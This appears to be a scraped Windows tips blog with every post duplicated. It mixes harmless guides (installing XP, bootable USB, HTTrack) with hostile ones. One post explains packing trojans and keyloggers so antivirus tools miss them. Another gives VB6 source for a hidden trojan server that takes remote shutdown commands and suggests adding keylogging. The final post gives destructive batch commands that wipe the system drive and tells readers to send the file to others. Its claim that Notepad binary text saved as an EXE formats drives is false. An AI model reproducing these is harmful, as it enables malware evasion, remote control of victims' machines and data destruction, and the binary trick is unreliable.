Install Windows xp Very Fast

Now, this tip will be very helpful for those who frequently install windows xp operating system. Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes.

This simple tricks goes this way.


1. Boot through Windows XP CD.

2. After all the files are completely loaded, you get the option to select the partition. Select “c”.


3. Now Format the partition, whether it is normal or quick with NTFS or FAT

4. Once the formatting is completed, All the setup files required for installation are copied. Restart your
system by pressing Enter.
Now, here begins the Simple trick to save 10-15 minutes.

5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.

6. Now, Press SHIFT + F10 Key -> This opens command prompt.

7. Enter “Taskmgr” at the command prompt window. This will open Task Manager.

8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal.
Thats it, no more work to do. Relax your self and see how fast the installation process completes
 



Install Windows xp Very Fast

Now, this tip will be very helpful for those who frequently install windows xp operating system. Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes.

This simple tricks goes this way.


1. Boot through Windows XP CD.

2. After all the files are completely loaded, you get the option to select the partition. Select “c�.


3. Now Format the partition, whether it is normal or quick with NTFS or FAT

4. Once the formatting is completed, All the setup files required for installation are copied. Restart your
system by pressing Enter.
Now, here begins the Simple trick to save 10-15 minutes.

5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.

6. Now, Press SHIFT + F10 Key -> This opens command prompt.

7. Enter “Taskmgr� at the command prompt window. This will open Task Manager.

8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal.
Thats it, no more work to do. Relax your self and see how fast the installation process completes
 



Add Face Recognition To Your PC With KeyLemon

KeyLemon is a software firm which offers quite simple, fast and convenient computer access solutions, based on face and speech recognition, for all internet users with a webcam. LemonLogin and LemonScreen are two great KeyLemon products. KeyLemon Screen automatically locks your computer when you move away and unlocks it back when you are again in front your PC while on the other hand KeyLemon Login uses your face to log on your computer.

















Few minutes back we got a mail from KeyLemon about the availability of its new version  that can be downloaded directly from their website www.keylemon.com. Now even if you don’t have a lenovo face recognition laptop, you can still get face recognition feature with KeyLemon.



Here are some of the great features in this new version of KeyLemon:
- automatically locks your computer when move away for a coffee
- unlocks when you are back in less time than typing your password
- view pictures of person who was in front of your computer before automatic lock
- view pictures of person who typed a wrong password when computer was locked
- Get even more about this new release here
Please note that Key Lemon is available in free trial version( for thirty uses),  but you can get the complete KeyLemon Lemon Screen and Lemon Login for USD 19.95.






Add Face Recognition To Your PC With KeyLemon

KeyLemon is a software firm which offers quite simple, fast and convenient computer access solutions, based on face and speech recognition, for all internet users with a webcam. LemonLogin and LemonScreen are two great KeyLemon products. KeyLemon Screen automatically locks your computer when you move away and unlocks it back when you are again in front your PC while on the other hand KeyLemon Login uses your face to log on your computer.

















Few minutes back we got a mail from KeyLemon about the availability of its new version  that can be downloaded directly from their website www.keylemon.com. Now even if you don’t have a lenovo face recognition laptop, you can still get face recognition feature with KeyLemon.



Here are some of the great features in this new version of KeyLemon:
- automatically locks your computer when move away for a coffee
- unlocks when you are back in less time than typing your password
- view pictures of person who was in front of your computer before automatic lock
- view pictures of person who typed a wrong password when computer was locked
- Get even more about this new release here
Please note that Key Lemon is available in free trial version( for thirty uses),  but you can get the complete KeyLemon Lemon Screen and Lemon Login for USD 19.95.






How to make ALL Trojan/Virus/Keylogger UNDETECTABLE


This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!
First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)
 2. Once you download the program, install it.
3. Once installed, you open it up and see this


:













By uttham at 2009-10-05
Code:

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!
It takes a long time to learn simplicity.








How to make ALL Trojan/Virus/Keylogger UNDETECTABLE


This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!
First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)
 2. Once you download the program, install it.
3. Once installed, you open it up and see this


:













By uttham at 2009-10-05
Code:

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!
It takes a long time to learn simplicity.








modifications-and-gaming


  • Modification of PC's


At Aman's Computer Services we can enhance your computer with a modern look to make your Desktop Computer stand out from the crowd!

After high demand from LAN Party gaming users and customers who require something a little different we offer the very best in modifications.




Make free CALLS from computer on Telephone,free calls computer system to mobile


Make free CALLS from computer on Telephone (100 % free) !
Using this VOIP program, you can call landline numbers in any country for FREE.
FreeCall is still a Freeware app but you only get 300 minutes a week.
To bypass this restriction:
Keep the setup.exe. Freecall’s protection system is quite flawed, when the program announces you cannot use any more minutes = Uninstall and reinstall and it will reset your 300 minutes which only takes a moment.

A)You MUST make an account with the program when it loads up. Then when your logged in (it will say at the bottom: ‘The client is logged on’)

B)Go to the dial pad TAB, ignore the on screen buttons, at the bottom type in your number and remember you need to add country codes at the beginning – NO spaces in the number either.

C) And it does do all countries for free – i’ve used it from NZ to england, USA, Spain and Aussie and they used it back.

D) If it didn’t work, you need to check your firewall settings etc, this is an obvious but a program like this needs full access.

Argentina free*
Australia free*
Austria free*
Belgium free*
Canada free*
Czech Republic free*
Denmark free*
France free*
Germany free*
Hong Kong (+mobile) free*
Hungary free*

India(landline+mobile)

Ireland free*
Italy free*
Luxembourg free*
Malaysia free*
Netherlands free*

New Zealand free*
Norway free*
Poland free*
Portugal free*
Puerto Rico (+mobile) free*
Russian Federation free*
Singapore free*
Slovenia free*
South Korea free*
Spain free*
Sweden free*
Switzerland free*
Taiwan free*
United Kingdom free*
United States (+mobile) free*






You can call this country for free from all countries…












Code:
http://rapidsare.com/files/106603127/setupfreecall_2.rar




Cool-Tricks-With-Google



Open your internet browser and do a search in GOOGLE something like "bird", "flower" etc and now copy the codes from below and paste it in the address bar of your browser and see the magic!!!!!!! Enjoy it..........






1.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style;DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

2.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.getElementsByTagName("div"); DIL=DI.length;function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
 
3.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.getElementsByTagName("img"); DIL=DI.length;function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=(Math.tan(R*x1+i*x2+x3)*x4+x5)+"px";DIS.top=(Math.sin(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
 
4.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.getElementsByTagName("img"); DIL=DI.length;function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=(Math.sin(R*1+i*x2+x3)*x1+x2)+"px";DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);








Cool-Tricks-With-Google



Open your internet browser and do a search in GOOGLE something like "bird", "flower" etc and now copy the codes from below and paste it in the address bar of your browser and see the magic!!!!!!! Enjoy it..........






1.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style;DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

2.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.getElementsByTagName("div"); DIL=DI.length;function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
 
3.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.getElementsByTagName("img"); DIL=DI.length;function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=(Math.tan(R*x1+i*x2+x3)*x4+x5)+"px";DIS.top=(Math.sin(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
 
4.
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.getElementsByTagName("img"); DIL=DI.length;function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=(Math.sin(R*1+i*x2+x3)*x1+x2)+"px";DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);








How to write a simple trojan in vb6 | Creating a Virus


How to write a simple trojan in vb6

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination

How to write a simple trojan in vb6 | Creating a Virus


How to write a simple trojan in vb6

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination

How to Download complete Website and save it on PC


When you discover an interesting website and want to copy a complete website to view it locally without internet connection. If in hurry, you can backup entire website on USB drive and view it afterward. Can be useful even if you want to save thousands of images from a webpage in one click.

HTTrack is a tool to save all the webpages from a specified website. The website downloaded when viewed offline looks exactly as it appears online. An exact mirror of the website is downloaded on your HardDisk with all the styles, background images and alignments keeping intact. The links pointing out of the page are also taken into consideration means those pages are also downloaded. For example: You have to download all the MP3 songs, Flash, videos or only some of them using Filters from a website all at once then WinHTTrack is a feasible option.

The sites downloaded can be used in your regular browser and there are no waiting times to load another page as all the pages are already stored offline in your Local Disk. Moreover, no active Internet connection required to access it. Personally, I used it to show  research pages of my Project to the concerned professor where internet connectivity was poor.

How to download complete website?

Enter Project name and Category (It can be anything according to the site you are downloading). Next the Base Path where the site will be downloaded.



More than one URL can be entered to be downloaded. Specify them in the box. You can specify filters to download specific extension of files like MP3, JPG or PNG from Set Options buttons.







Then Press Finish to start copying. You can prefer to shutdown PC after downloading is completed  as it may take few minutes depending upon the size of files hosted on site.
 


Now, to view the downloaded website go to the output folder and click on index.html file (general name) or open the HTTrack Website copier program and click Browse Sites from File menu.
 
 

Click Here to Download HTTrack 
 
 
 
 
 
 
 
 
 

 



How to Download complete Website and save it on PC


When you discover an interesting website and want to copy a complete website to view it locally without internet connection. If in hurry, you can backup entire website on USB drive and view it afterward. Can be useful even if you want to save thousands of images from a webpage in one click.

HTTrack is a tool to save all the webpages from a specified website. The website downloaded when viewed offline looks exactly as it appears online. An exact mirror of the website is downloaded on your HardDisk with all the styles, background images and alignments keeping intact. The links pointing out of the page are also taken into consideration means those pages are also downloaded. For example: You have to download all the MP3 songs, Flash, videos or only some of them using Filters from a website all at once then WinHTTrack is a feasible option.

The sites downloaded can be used in your regular browser and there are no waiting times to load another page as all the pages are already stored offline in your Local Disk. Moreover, no active Internet connection required to access it. Personally, I used it to show  research pages of my Project to the concerned professor where internet connectivity was poor.

How to download complete website?

Enter Project name and Category (It can be anything according to the site you are downloading). Next the Base Path where the site will be downloaded.



More than one URL can be entered to be downloaded. Specify them in the box. You can specify filters to download specific extension of files like MP3, JPG or PNG from Set Options buttons.







Then Press Finish to start copying. You can prefer to shutdown PC after downloading is completed  as it may take few minutes depending upon the size of files hosted on site.


Now, to view the downloaded website go to the output folder and click on index.html file (general name) or open the HTTrack Website copier program and click Browse Sites from File menu.

Click Here to Download HTTrack 




How To Make Bootable USB

Having a bootable USB is very essential, especially if you are a Netbook user. Using bootable USB to install an operating system (OS) not only makes the installation faster, but also saves a DVD.
Creating or using an USB drive to install Windows operating systems is very easy if you follow the below mentioned steps.










Coming back to bootable USB guide, here we assume that you are using either Vista or Windows 7 to create a bootable USB.
1. Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.
2. Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.
3. When the Command Prompt opens, enter the following command:
DISKPART and hit enter.
LIST DISK and hit enter.
Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.
4. In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.
SELECT DISK 1 (Replace DISK 1 with your disk number)
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT




























Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.
5. Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “D” as my optical (DVD) drive letter and “H” as my USB drive letter.
6. Go back to command prompt and execute the following commands:
D:CD BOOT and hit enter. Where “D” is your DVD drive letter.
CD BOOT and hit enter to see the below message.
BOOTSECT.EXE/NT60 H:
(Where “H” is your USB drive letter














7. Copy Windows DVD contents to USB.
You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).
Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.

How To Make Bootable USB

Having a bootable USB is very essential, especially if you are a Netbook user. Using bootable USB to install an operating system (OS) not only makes the installation faster, but also saves a DVD.
Creating or using an USB drive to install Windows operating systems is very easy if you follow the below mentioned steps.










Coming back to bootable USB guide, here we assume that you are using either Vista or Windows 7 to create a bootable USB.
1. Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.
2. Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.
3. When the Command Prompt opens, enter the following command:
DISKPART and hit enter.
LIST DISK and hit enter.
Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.
4. In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.
SELECT DISK 1 (Replace DISK 1 with your disk number)
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT




























Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.
5. Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “D” as my optical (DVD) drive letter and “H” as my USB drive letter.
6. Go back to command prompt and execute the following commands:
D:CD BOOT and hit enter. Where “D” is your DVD drive letter.
CD BOOT and hit enter to see the below message.
BOOTSECT.EXE/NT60 H:
(Where “H” is your USB drive letter














7. Copy Windows DVD contents to USB.
You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).
Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.

Chat with Friends through ms dos Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this












7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:











8) Now all you need to do is type your message and press Enter.
Start Chatting.......! 




















Chat with Friends through ms dos Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this












7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:











8) Now all you need to do is type your message and press Enter.
Start Chatting.......! 




















Format A HDD With Notepad


If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
 
Step 2 :-
Save As An EXE Any Name Will Do

Step 3 :-
Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file